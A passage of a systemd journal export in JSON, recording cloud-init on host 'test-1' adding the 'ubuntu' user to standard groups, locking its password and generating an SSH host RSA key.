"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309862" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27d;b=e2b08827b5804427b422c10c84f1567e;m=29089cc;t=5bd16df540934;x=1f3068894cde168a", "__REALTIME_TIMESTAMP" : "1615280817310004", "__MONOTONIC_TIMESTAMP" : "43026892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309997" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27e;b=e2b08827b5804427b422c10c84f1567e;m=2908a4c;t=5bd16df5409b4;x=4f2b7d9150228540", "__REALTIME_TIMESTAMP" : "1615280817310132", "__MONOTONIC_TIMESTAMP" : "43027020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310125" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27f;b=e2b08827b5804427b422c10c84f1567e;m=2908ae3;t=5bd16df540a4a;x=6ccc14c1c1ab2dd3", "__REALTIME_TIMESTAMP" : "1615280817310282", "__MONOTONIC_TIMESTAMP" : "43027171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310275" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=280;b=e2b08827b5804427b422c10c84f1567e;m=2908b84;t=5bd16df540aec;x=751261d8bc9cc011", "__REALTIME_TIMESTAMP" : "1615280817310444", "__MONOTONIC_TIMESTAMP" : "43027332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310435" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=281;b=e2b08827b5804427b422c10c84f1567e;m=2908c12;t=5bd16df540b79;x=cc3b0e05082a5fcc", "__REALTIME_TIMESTAMP" : "1615280817310585", "__MONOTONIC_TIMESTAMP" : "43027474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310578" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=282;b=e2b08827b5804427b422c10c84f1567e;m=2908c94;t=5bd16df540bfb;x=785dfbc3f11eaeb2", "__REALTIME_TIMESTAMP" : "1615280817310715", "__MONOTONIC_TIMESTAMP" : "43027604", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310709" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=283;b=e2b08827b5804427b422c10c84f1567e;m=2908d1a;t=5bd16df540c81;x=e008fd5bb62252ab", "__REALTIME_TIMESTAMP" : "1615280817310849", "__MONOTONIC_TIMESTAMP" : "43027738", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310842" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=284;b=e2b08827b5804427b422c10c84f1567e;m=2908d9e;t=5bd16df540d05;x=e89d6773cff887e1", "__REALTIME_TIMESTAMP" : "1615280817310981", "__MONOTONIC_TIMESTAMP" : "43027870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310974" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=285;b=e2b08827b5804427b422c10c84f1567e;m=2908e20;t=5bd16df540d87;x=18af57c4ba9c414f", "__REALTIME_TIMESTAMP" : "1615280817311111", "__MONOTONIC_TIMESTAMP" : "43028000", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311105" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=286;b=e2b08827b5804427b422c10c84f1567e;m=2908ef8;t=5bd16df540e60;x=efc5bf646a38b30a", "__REALTIME_TIMESTAMP" : "1615280817311328", "__MONOTONIC_TIMESTAMP" : "43028216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311319" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=287;b=e2b08827b5804427b422c10c84f1567e;m=2908f88;t=5bd16df540eef;x=3d2956e132d9a7aa", "__REALTIME_TIMESTAMP" : "1615280817311471", "__MONOTONIC_TIMESTAMP" : "43028360", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=288;b=e2b08827b5804427b422c10c84f1567e;m=2909019;t=5bd16df540f80;x=6db6906e2b974e45", "__REALTIME_TIMESTAMP" : "1615280817311616", "__MONOTONIC_TIMESTAMP" : "43028505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311609" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=289;b=e2b08827b5804427b422c10c84f1567e;m=290909d;t=5bd16df541004;x=7439e56038c0c4bf", "__REALTIME_TIMESTAMP" : "1615280817311748", "__MONOTONIC_TIMESTAMP" : "43028637", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311741" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28a;b=e2b08827b5804427b422c10c84f1567e;m=2933baf;t=5bd16df56bb16;x=1b509b93a3ec76a9", "__REALTIME_TIMESTAMP" : "1615280817486614", "__MONOTONIC_TIMESTAMP" : "43203503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "passwd", "SYSLOG_PID" : "740", "MESSAGE" : "password for 'ubuntu' changed by 'root'", "_PID" : "740", "_COMM" : "passwd", "_EXE" : "/usr/bin/passwd", "_CMDLINE" : "passwd -l ubuntu", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817486592" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5ca7bdd0ee6da0a6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private rsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d2b08f02c587437", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_rsa_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=81dee9f6fe1e28cd", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_rsa_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=27784decd912f835", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=290;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=291;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=673b6c2297980d5b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[RSA 2048]----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=292;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d550c1613250691", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : 